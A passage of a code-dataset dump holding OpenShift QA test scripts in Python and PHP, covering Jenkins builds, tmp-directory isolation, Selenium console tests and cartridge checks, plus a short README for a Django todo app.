push again\",\n cmd,\n expect_description=\"Git push should succeed\",\n expect_return=0).run()\n # Trigger jenkins build\n (retcode, self.output[9]) = testcase.TestCaseStep(\"Trigger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.git_repo],\n expect_description=\"Git push should succeed\",\n expect_return=True).run()\n\n # 10.Check if the changes take effect\n (retcode, self.output[10]) = testcase.TestCaseStep(\"10.Check if the changes take effect\",\n common.grep_web_page,\n function_parameters=[app_url, test_html, \"-k -H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0).run()\n\n common.destroy_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n \n\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsNegativeTesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5241718888282776, "alphanum_fraction": 0.5519248247146606, "avg_line_length": 29.602739334106445, "blob_id": "1f656c48dab9b74c89be8b0c16058376ec380d01", "content_id": "b5fa1105c6aa8ca33a9889497dc2a0219116873f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2234, "license_type": "no_license", "max_line_length": 86, "num_lines": 73, "path": "/automation/open/testmodules/RT/client/data/snapshot_restore_data_dir/index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\n$OPENSHIFT_DATA_DIR = getenv(\"OPENSHIFT_DATA_DIR\");\n$target_file = $OPENSHIFT_DATA_DIR.\"php_data_test\";\n\nif(!empty($_GET[\"action\"])) {\n $action_name = $_GET[\"action\"];\n if ($action_name == \"create\"){\n $key_string = \"snapshot_restore_data_dir_test1\";\n $command1 = \"echo \".$key_string.\" >\".$target_file.\" 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n $command2 = \"dd if=/dev/urandom of=\".$OPENSHIFT_DATA_DIR.\"bigfile bs=1M count=1\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"cat \".$target_file.\" 2>&1 && [ -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: 
\".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 and $ret2 == 0 and $ret_tmp == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n } elseif ($action_name == \"modify\") {\n $key_string = \"snapshot_restore_data_dir_test2\";\n $command1 = \"echo \".$key_string.\" >\".$target_file.\" 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n $command2 = \"rm -f \".$OPENSHIFT_DATA_DIR.\"bigfile\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"cat \".$target_file.\" 2>&1 && [ ! -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 and $ret2 == 0 and $ret_tmp == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n } else {\n $command = \"cat \".$target_file.\" 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n $command2 = \"[ -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n if ($ret2 == 0) {\n echo \"file: bigfile exists\\n\";\n }\n else {\n echo \"file: bigfile doesn't exist\\n\";\n }\n }\n} else {\n $command = \"cat \".$target_file.\" 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n $command2 = \"[ -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n if ($ret2 == 0) {\n echo \"file: bigfile exists\\n\";\n }\n else {\n echo \"file: bigfile does not exist\\n\";\n }\n}\n\n?>\n" }, { "alpha_fraction": 0.5224581956863403, "alphanum_fraction": 0.5290738344192505, "avg_line_length": 46.471073150634766, "blob_id": "c6413bfe6c77cd8bebcb9fc4fd0f5e4021272968", "content_id": "14111f798a0c46890fdf10aa6bfd8814e55f06c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5744, "license_type": "no_license", "max_line_length": 194, "num_lines": 121, "path": "/automation/open/testmodules/RT/cartridge/auto_embed_jenkins_to_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type1 = \"ruby-1.8\"\n self.app_name1 = \"testapp1\"\n self.app_type2 = \"python-2.6\"\n self.app_name2 = \"testapp2\"\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass AutoEmbedJenkinsToApp(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Get 'rhc app create' help output to make sure it supoort auto enable jenkins\",\n \"rhc help app create\",\n expect_return=0,\n expect_string_list=['Create an application', 'enable-jenkins \\[NAME\\]']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create app with --enable-jenkins option\",\n \"rhc app create %s %s -l %s -p '%s' --enable-jenkins %s\" %(self.app_name1, self.app_type1, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"App with jenkins created success\",\n expect_return=0,\n expect_string_list=[\"Jenkins client 1.4 has been added to\"]\n )\n# expect_string_list=['Jenkins 
created successfully']\n# )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Get user info to check jenkins app be listed\",\n \"rhc domain show -l %s -p '%s' %s\" %(self.user_email,self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=['jenkins-1.4', 'applications in your domain', '%s-build' %(self.app_name1)]\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Do some change in app repo, and git push to trigger jenkins build\",\n \"cd %s && touch test && git add test && git commit -a -m 'update' && git push \" %(self.app_name1),\n expect_return=0,\n expect_string_list=['Executing Jenkins build', 'Waiting for build to schedule', 'SUCCESS']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Delete one app to release app quota for next step\",\n \"rhc app delete %s -l %s -p '%s' --confirm %s\" %(self.app_name1, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n step = testcase.TestCaseStep(\"Delete builder app to release app quota for next step\",\n \"rhc app delete %s -l %s -p '%s' --confirm %s\" %(self.app_name1 + 'bldr', self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create another app without --enable-jenkins option\",\n \"rhc app create %s %s -l %s -p '%s' %s\" %(self.app_name2, self.app_type2, self.user_email,self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Get user info to check jenkins app be listed\",\n \"rhc domain show -l %s -p '%s' %s\" %(self.user_email,self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=[self.app_name2],\n unexpect_string_list=['%s-build' %(self.app_name2)]\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Do some change in app repo, and git push\",\n \"cd %s && touch test && git add test && git commit -a -m 'update' && git push \" %(self.app_name2),\n expect_description=\"There should NO jenkins build\",\n expect_return=0,\n unexpect_string_list=['Waiting for build to schedule', 'Executing Jenkins build']\n )\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[US1279] [rhc-client] Automatically embed jenkins to your application via --enable-jenkins option of rhc cliet tools\",\n self.steps_list)\n\n case.add_clean_up(OSConf.initial_conf,function_parameters=[])\n case.run()\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AutoEmbedJenkinsToApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5760909914970398, "alphanum_fraction": 0.5921298265457153, "avg_line_length": 39.30826950073242, "blob_id": "8e828d4dca491208e68dcb78c0d6bf08ba1a9613", "content_id": "08eabf845dd4314b13338829b6ca9321de6b03a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5362, "license_type": "no_license", "max_line_length": 117, "num_lines": 133, "path": "/automation/open/testmodules/RT/security/polyinstantiation_tmp_dir.py", "repo_name": 
"fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[Security] Polyinstantiation of /tmp and /var/tmp for new application by using pam_namespace\nhttps://tcms.engineering.redhat.com/case/122331/?from_plan=4962\n\"\"\"\n\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[Security] Polyinstantiation of /tmp and /var/tmp for new application by using pam_namespace\"\n self.info(self.summary)\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"WARN: Missing OPENSHIFT_test_name, used `php` as default.\")\n test_name= \"php\"\n\n self.app_type = common.app_types[test_name]\n self.app_name1 = test_name + \"1\"\n self.app_name2 = test_name + \"2\"\n\n if test_name == \"php\":\n file_name = \"polyinstantiation_tmp_dir_index.php\"\n self.source_file = \"%s/data/%s\" %(WORK_DIR, file_name)\n self.target_file1 = \"%s/php/index.php\" %(self.app_name1)\n self.target_file2 = \"%s/php/index.php\" %(self.app_name2)\n self.url_path1 = \"index.php?action=create\"\n self.url_path2 = \"index.php\"\n elif test_name == \"wsgi\":\n file_name = \"polyinstantiation_tmp_dir_application.py\"\n self.source_file = \"%s/data/%s\" %(WORK_DIR, file_name)\n self.target_file1 = \"%s/wsgi/application\" %(self.app_name1)\n self.target_file2 = \"%s/wsgi/application\" %(self.app_name2)\n self.url_path1 = \"create\"\n self.url_path2 = \"show\"\n elif test_name == \"perl\":\n file_name = \"polyinstantiation_tmp_dir_index.pl\"\n self.source_file = \"%s/data/%s\" %(WORK_DIR, file_name)\n self.target_file1 = \"%s/perl/index.pl\" %(self.app_name1)\n self.target_file2 = \"%s/perl/index.pl\" %(self.app_name2)\n self.url_path1 = \"index.pl?action=create\"\n self.url_path2 = \"index.pl\"\n elif test_name == \"rack\":\n file_name = \"polyinstantiation_tmp_dir_rack/*\"\n self.source_file = \"%s/data/%s\" %(WORK_DIR, file_name)\n self.target_file1 = \"%s/\" %(self.app_name1)\n self.target_file2 = \"%s/\" %(self.app_name2)\n self.url_path1 = \"create\"\n self.url_path2 = \"show\" \n else:\n raise TestSuiteAbort(\"unknown variant: %s\"%self.test_variant)\n\n tcms_testcase_id=122331\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n\nclass PolyinstantiantionTmpDir(OpenShiftTest):\n def test_method(self):\n self.info(\"1. Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name1, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(0, ret, \"App#1 should be created successfully\") \n\n self.info(\"2. Copying test files to app git repo\")\n ret = common.command_get_status(\"cp -f %s %s\" %(self.source_file, self.target_file1))\n self.assert_equal(0, ret)\n\n self.info(\"3. Do git commit\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name1))\n self.assert_equal(0, ret, \"File and directories are added to your git repo successfully\")\n\n app_url = OSConf.get_app_url(self.app_name1)\n\n self.info(\"4. Access app's URL to create files in tmp directory\")\n ret = common.grep_web_page(\"%s/%s\" %(app_url, self.url_path1), [\"RESULT=0\"])\n\n self.assert_equal(0, ret, \"RESULT=0 should be seen in output of %s\"%app_url)\n\n self.info(\"5. 
Create another %s application\" %(self.app_type))\n        ret = common.create_app(self.app_name2, \n                                self.app_type, \n                                self.config.OPENSHIFT_user_email, \n                                self.config.OPENSHIFT_user_passwd)\n        self.assert_equal(0, ret, \"App#2 should be created successfully\")\n\n        self.info(\"6. Copying test files to app git repo\")\n        ret = common.command_get_status(\"cp -f %s %s\" %(self.source_file, self.target_file2))\n        self.assert_equal(0, ret, \"Copy should be done.\")\n\n        self.info(\"7. Do git commit\")\n        ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name2))\n        self.assert_equal(0, ret, \"File and directories are added to your git repo successfully\")\n\n        self.info(\"8. Get app url\")\n        app_url = OSConf.get_app_url(self.app_name2)\n\n        self.info(\"9. Access app's URL to check files in tmp directory\")\n        ret = common.grep_web_page(\"%s/%s\" %(app_url, self.url_path2), \n                [\"RESULT=1\", \"No such file or directory\"])\n        self.assert_equal(ret, 0, \"Files created by app#1 should not be visible in app#2's tmp directory\")\n\n        return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(PolyinstantiationTmpDir)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5949074029922485, "alphanum_fraction": 0.6211419701576233, "avg_line_length": 20.94915199279785, "blob_id": "38d2534d854a00ad24c4c8dcb4c9a1de47af5e35", "content_id": "799a1d1e02116d46b7e21cd562d9dc7893e2880d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1296, "license_type": "no_license", "max_line_length": 94, "num_lines": 59, "path": "/automation/open/testmodules/UI/web/case_122423.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122423.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass Create_app_blank_name(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n        web.login()\n        \n        #Create app with blank name\n        web.assert_text_equal_by_xpath('''MANAGEMENT CONSOLE''',\n            '''//div/span''')\n        web.go_to_create_drupal()\n        web.click_element_by_id('application_submit')\n        time.sleep(5)\n        web.assert_text_equal_by_xpath('''Application name is required and cannot be blank''',\n            '''//form[@id='new_application']/ul/li''') \n\n        self.tearDown()\n\n        return self.passed(\"Case 122423 test passed.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(Create_app_blank_name)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_122423.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6305501461029053, "alphanum_fraction": 0.643395721912384, "avg_line_length": 42.93251419067383, "blob_id": "90ed095704f22bad1d84f423c5b3cab2497bf52b", "content_id": "383c3a828faedf8b970c8c4fe54fdb84e3fc62e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7162, "license_type": "no_license", "max_line_length": 150, "num_lines": 163, "path": 
"/automation/open/testmodules/UI/web/tc_createdomain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport random\nimport HTMLTestRunner\n\n\nclass CreateDomain(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.domain=self.generate_domain_name()\n self.sshkey=self.ssh_key(\"id_rsa.pub\")\n \n def generate_domain_name(self):\n i=random.uniform(1,10)\n domain_name=\"test\"+str(i)[2:10]\n return domain_name\n\n def generate_new_sshkey(self,ssh_key_file):\n i=random.uniform(1,10)\n h = open(ssh_key_file, 'rb')\n _oldssh=h.read()\n _newssh=_oldssh[0:366]+str(i)[2:10]\n return _newssh\n\n def ssh_key(self,ssh_key_file):\n f = open(ssh_key_file, 'rb')\n ssh=f.read()\n # print ssh\n return ssh\n\n \n\n def create_domain(self,domain_name):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n # baseutils.click_element_by_link_text(self,\"Express Console\")\n time.sleep(5)\n '''\n if config.proxy == 1:\n baseutils.click_element_by_link_text(self,\"Looking for OpenShift Flex?\")\n time.sleep(15)\n try: self.assertEqual(\"https://stg.openshift.redhat.com/flex/flex/index.html\", self.driver.current_url())\n except AssertionError as e: self.verificationErrors.append(str(e))\n baseutils.go_back(self)\n else: baseutils.assert_element_present_by_link_text(self,\"Looking for OpenShift Flex?\")\n '''\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n # baseutils.assert_text_equal_by_xpath(self,\"Desired domain name*\",\"//li[@id='express_domain_namespace_input']/label\")\n baseutils.click_element_by_link_text(self,\"Edit...\")\n time.sleep(5)\n baseutils.wait_element_present_by_id(self,\"express_domain_namespace\")\n baseutils.input_by_id(self,\"express_domain_namespace\",domain_name)\n# baseutils.input_by_id(self,\"express_domain_ssh\",ssh)\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n \n def test_a_create_domain_no_domain_name(self):\n self.create_domain(\"\")\n baseutils.assert_text_equal_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\".//*[@id='express_domain_namespace_input']/label[2]\")\n\n \n# def test_b_create_domain_no_ssh_key(self):\n# self.create_domain(self.domain,\"\")\n# baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"#express_domain_ssh_input > label.error\")\n\n def test_c_create_domain_with_blacklist(self):\n self.create_domain(\"jboss\")\n baseutils.assert_text_equal_by_css(self,\"Namespace jboss is not permitted\",\"div.error.message\")\n \n def test_d_create_domain_with_nonalpha(self):\n self.create_domain(\"test_55\")\n baseutils.assert_text_equal_by_css(self,\"ONLY LETTERS AND NUMBERS ARE ALLOWED\",\"label.error\")\n \n def test_e_create_domain_with_over16charater(self):\n self.create_domain(\"abcdefg1234567890\")\n baseutils.assert_value_equal_by_id(self,\"abcdefg123456789\",\"express_domain_namespace\")\n\n \n def test_f_create_domain_with_existing_name(self):\n self.create_domain(config.exist_domain)\n time.sleep(5)\n 
baseutils.assert_text_equal_by_xpath(self,\"A namespace with name \\'\"+config.exist_domain+\"\\' already exists\",\"//div[@id='cp-dialog']/div/div\")\n    '''\n    def test_g_create_domain_normally(self):\n        domain_name=self.generate_domain_name()\n        domain_name2=domain_name\n        self.create_domain(self.domain)\n        time.sleep(10)\n        baseutils.go_to_home(self)\n        baseutils.go_to_express_console(self)\n        baseutils.scroll_bar(self)\n        baseutils.assert_text_equal_by_xpath(self,domain_name2,\"//div[@id='domains']/div[2]/div\")\n    '''\n    def test_h_change_domain_name(self):\n        baseutils.go_to_home(self)\n        time.sleep(4)\n        baseutils.go_to_signin(self)\n        baseutils.login(self,config.domainuser[0],config.domainuser[1])\n        baseutils.go_to_express_console(self)\n        baseutils.scroll_bar(self)\n        baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n        while self.driver.current_url not in [self.base_url+\"/app/dashboard\",self.base_url+\"/app/control_panel\"]:\n            baseutils.go_to_express_console(self)\n        try:\n            while (not baseutils.assert_element_present_by_id(self,\"express_domain_namespace\")):\n                baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n        except:pass\n        _value=self.driver.find_element_by_id(\"express_domain_namespace\").get_attribute(\"value\")\n        _newvalue=_value[:len(_value)-1]\n        baseutils.input_by_id(self,\"express_domain_namespace\",_newvalue)\n        baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n        time.sleep(5)\n        baseutils.assert_text_equal_by_css(self,_newvalue,\"div.current.domain\")\n\n    def test_i_create_domain_sshkey(self):\n        baseutils.go_to_home(self)\n        time.sleep(4)\n        baseutils.go_to_signin(self)\n        baseutils.login(self,config.tochangepwduser[0],config.tochangepwduser[1])\n        baseutils.go_to_express_console(self)\n        baseutils.scroll_bar(self)\n        baseutils.click_element_by_xpath(self,\".//div[@id='ssh_container']/div/div[2]/div/a\")\n        _newssh=self.ssh_key(\"id2_rsa.pub\")\n        baseutils.input_by_id(self,\"ssh_form_express_domain_ssh\",_newssh)\n        baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n        time.sleep(5)\n        baseutils.assert_text_equal_by_css(self,_newssh[0:20]+\"...\",\"div.current.ssh\")\n\n    def test_j_change_domain_sshkey(self):\n        baseutils.go_to_home(self)\n        time.sleep(4)\n        baseutils.go_to_signin(self)\n        baseutils.login(self,config.tochangepwduser[0],config.tochangepwduser[1])\n        baseutils.go_to_express_console(self)\n        baseutils.scroll_bar(self)\n        baseutils.click_element_by_xpath(self,\".//div[@id='ssh_container']/div/div[2]/div/a\")\n        _newssh=self.generate_new_sshkey(\"id2_rsa.pub\")\n#        _changessh=_newssh[1:374]+\"a\"\n        baseutils.input_by_id(self,\"ssh_form_express_domain_ssh\",_newssh)\n        baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n        time.sleep(5)\n        baseutils.assert_text_equal_by_css(self,_newssh[0:20]+\"...\",\"div.current.ssh\")\n\n    def tearDown(self):\n        self.driver.quit()\n        self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n    unittest.main()\n    # HTMLTestRunner.main() \n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6399999856948853, "avg_line_length": 15.399999618530273, "blob_id": "cdbf05dd5b5cf90616e716bddd185606eebcf4e7", "content_id": "a205b4dff1e7f0e4c586404f4299d54bcb267947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 50, "num_lines": 10, "path": 
"/simpletodo/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Django-Simple-Todo\r\n==================\r\n\r\nsimple-todo dajngo版\r\n\r\n使用的环境: fedora 17 + django1.4 + python2.7 + sqlite3\r\n\r\n前端使用的 bootstrap + jquery\r\n\r\n实现添加修改删除 ajax支持 可自行添加用户控制 \r\n" }, { "alpha_fraction": 0.6133518815040588, "alphanum_fraction": 0.6133518815040588, "avg_line_length": 34.36065673828125, "blob_id": "0c87fa0842148acf01dde33e34f971b37a577508", "content_id": "a21d9e723180e391cd7af7e272839ee061d9d555", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2157, "license_type": "no_license", "max_line_length": 206, "num_lines": 61, "path": "/automation/open/testmodules/RT/quick_start/quick_start_redmine.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport OSConf\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartRedmine(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types['mysql'] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Redmine\"\n self.config.git_upstream_url = \"git://github.com/openshift/redmine-openshift-quickstart.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = r\"(Projects|Sign in|Redmine|Register)\"\n \n def pre_configuration_steps(self):\n self.log_info(\"Pre-configuration steps...\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"rm -Rfv *\"\n ]\n common.command_get_status(\" && \".join(steps))\n \n def post_configuration_steps(self):\n self.log_info(\"Post-configuration steps...\")\n mysql = OSConf.get_embed_info(self.config.application_name, common.cartridge_types['mysql'])\n steps = [\n \"cd %s\" % self.config.application_name,\n \"sed -i -e 's/password:.*/password: %s/' -e 's/database: redmine/database: %s/' -e 's/host:.*/host: %s/' config/database.yml\" % ( mysql[\"password\"], self.config.application_name, mysql[\"url\"] ) \n ]\n common.command_get_status(\" && \".join(steps))\n \n def pre_deployment_steps(self):\n self.log_info(\"Pre-deloyment steps...\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m db_changes\" \n ]\n common.command_get_status(\" && \".join(steps))\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartRedmine)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5967914462089539, "alphanum_fraction": 0.605704128742218, "avg_line_length": 27.040000915527344, "blob_id": "9f625877563df7a83c87cfb3f39f7f8a0616c335", "content_id": "377835ced4a1d95c8c89f6dee33e99eb13ee9bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2805, "license_type": "no_license", "max_line_length": 122, "num_lines": 100, "path": "/automation/open/testmodules/RT/cartridge/valid_descriptor_manifest.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: valid_descriptor_manifest.py\n# Date: 2012/02/24 04:21\n# Author: [email protected]\n#\n\nimport 
sys\nimport os\nimport testcase\nimport common\nimport commands\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n    ITEST = \"DEV\"\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[rhc-cartridge][US-1664] Valid cartridge descriptor manifest.yml\"\n        self.tcms_testcase_id = 128860\n        self.steps_list = []\n\n        common.env_setup()\n\n    def finalize(self):\n        pass\n\nclass ValidDescriptorManifest(OpenShiftTest):\n\n    def test_method(self):\n        (status, output) = common.run_remote_cmd_as_root('rpm -qa | grep ^openshift-origin-cartridge- | grep -v abstract')\n        if status!=0:\n            self.error('Unable to get the list of cartridges...')\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        cartridges = output.splitlines()\n        for cart in cartridges:\n            rpm = RPMPackage(cart)\n            #print 'Cartridge RPM: ' + cart\n            #print \" Manifest.yml exists? \",\n            self.steps_list.append(testcase.TestCaseStep(\"Valid descriptors for %s\"%cart, \n                rpm.existManifestFile,\n                function_parameters=[], \n                expect_return=True))\n\n\n        case = testcase.TestCase(self.summary, self.steps_list)\n        try:\n            case.run()\n        except testcase.TestCaseStepFail:\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass RPMPackage:\n\n    def __init__(self, package):\n        self.package = package\n        self.manifestfile = None\n\n    def getFileList(self):\n        #return commands.getoutput('rpm -ql ' + self.package).splitlines()\n        (status, output) = common.run_remote_cmd_as_root('rpm -ql ' + self.package)\n        return output.splitlines()\n\n    def getManifestFilePath(self):\n        return self.manifestfile\n\n    def existManifestFile(self):\n        filelist = self.getFileList()\n        existManifestFile = False\n        for file in filelist:\n            if file.endswith('manifest.yml'):\n                existManifestFile = True\n                self.manifestfile = file\n                break\n        return existManifestFile\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(ValidDescriptorManifest)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of valid_descriptor_manifest.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6327834129333496, "alphanum_fraction": 0.6327834129333496, "avg_line_length": 32.55356979370117, "blob_id": "be1c46d50fa3c50e2bf67c710b11c9398b2e7eb6", "content_id": "2f52fe76dec53dabab1da479958134476d0989ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 